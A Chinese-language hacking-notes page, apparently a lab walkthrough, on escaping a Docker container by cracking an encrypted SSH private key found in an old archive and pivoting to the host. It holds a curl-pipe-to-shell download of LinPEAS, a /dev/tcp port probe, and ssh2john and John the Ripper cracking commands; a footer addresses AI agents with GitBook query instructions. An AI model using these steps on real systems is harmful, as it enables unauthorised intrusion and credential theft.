> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/zh/privesc/docker-escape/docker-ssh-keys-linux-privilege-escalation.md).

# Docker 逃逸（SSH 密钥）- Linux 权限提升

## 这是什么

Docker 逃逸路径会利用容器配置错误、挂载的主机资源、默认凭证、重复使用的密码或过高的容器权限。目标是从容器上下文转到主机级访问。此特定页面重点介绍 **Docker 逃逸（SSH 密钥）** 并保持利用流程切合实际：识别条件，安全验证，然后运行证明影响所需的最小载荷。

## 枚举

在运行利用路径之前，先确认本地上下文和具体的错误配置。

```bash
id
cat /proc/1/cgroup
挂载
ls -la /var/run/docker.sock 2>/dev/null
```

## 示例

我们位于容器内，并使用命令查找宿主机一侧的容器地址（192.168.150.1）。然后我们检查这台机器上的 22 端口是否开放。

<figure><img src="/files/1dcc3ed8b8f0ac1ac731ce37ccec9bf631e21b9e" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/bea8a3c5722d5e433bea404e6db875faf6e6c279" alt=""><figcaption></figcaption></figure>

```bash
echo '' > /dev/tcp/192.168.150.1/22
```

<figure><img src="/files/9eb2225753ce553aa67a4b609a239750d71401c9" alt=""><figcaption></figcaption></figure>

### **系统枚举（**[**LinPEAS**](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS)**):**

我们使用 LinPEAS 进行提权枚举：

```bash
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
```

<figure><img src="/files/906667505dfc0a525a1908991ab89a0e4a9aa666" alt=""><figcaption></figcaption></figure>

**我们在根目录中发现了一个意外的 tgz 文件夹。**

<figure><img src="/files/55fc6e61b43bcc1b6723b559b9b25a06c0a27918" alt=""><figcaption></figcaption></figure>

```bash
cp /.oldkeys.tgz /tmp/
cd !$
mv .oldkeys.tgz oldkeys.tgz
tar -xf oldkeys.tgz
```

### **受保护的私有 SSH 密钥破解：**

### 私有 SSH 密钥识别

我们识别出一对 OpenSSH 公钥和私钥。

<figure><img src="/files/f69e2c20fd6e38beb7de3424f20118a60bf7abe7" alt=""><figcaption></figcaption></figure>

### 私钥破解：

* 我们观察到私钥是加密的

<figure><img src="/files/a0ac445189f2dbb6f1f9b0496731b17bdb460582" alt=""><figcaption></figcaption></figure>

* 我们使用 **ssh2john.py** 用于将文件内容转换为哈希：

```bash
python2.7 /usr/share/john/ssh2john.py id_rsa
```

<figure><img src="/files/b6a84b259bdec16807df068ee4967a4b19c3a9ab" alt=""><figcaption></figcaption></figure>

* 然后我们使用 John the Ripper 结合密码字典文件破解该哈希。

```bash
john -w:/usr/share/wordlists/rockyou.txt hash
```

<figure><img src="/files/78bc7ece113e6986702ebf4285db4d8345073426" alt=""><figcaption></figcaption></figure>

### 以 root 身份访问：

我们以 root 身份访问到这台机器。

<figure><img src="/files/967ad64709e93ab023e49781d6eac7b9e1cbaf9a" alt=""><figcaption></figcaption></figure>

### **滥用 SSH 密钥信任以逃离容器：**

使用 `known_hosts` 容器 SSH 目录中的配置，用于横向移动到另一台机器，从而让我们连接到宿主机上的 admin 用户。

<figure><img src="/files/defa0c62f6c1aee301f6a037243e0d6f35491cf5" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/fe58725dc616e9c9b5edfdd42bb997a945dadc13" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/zh/privesc/docker-escape/docker-ssh-keys-linux-privilege-escalation.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
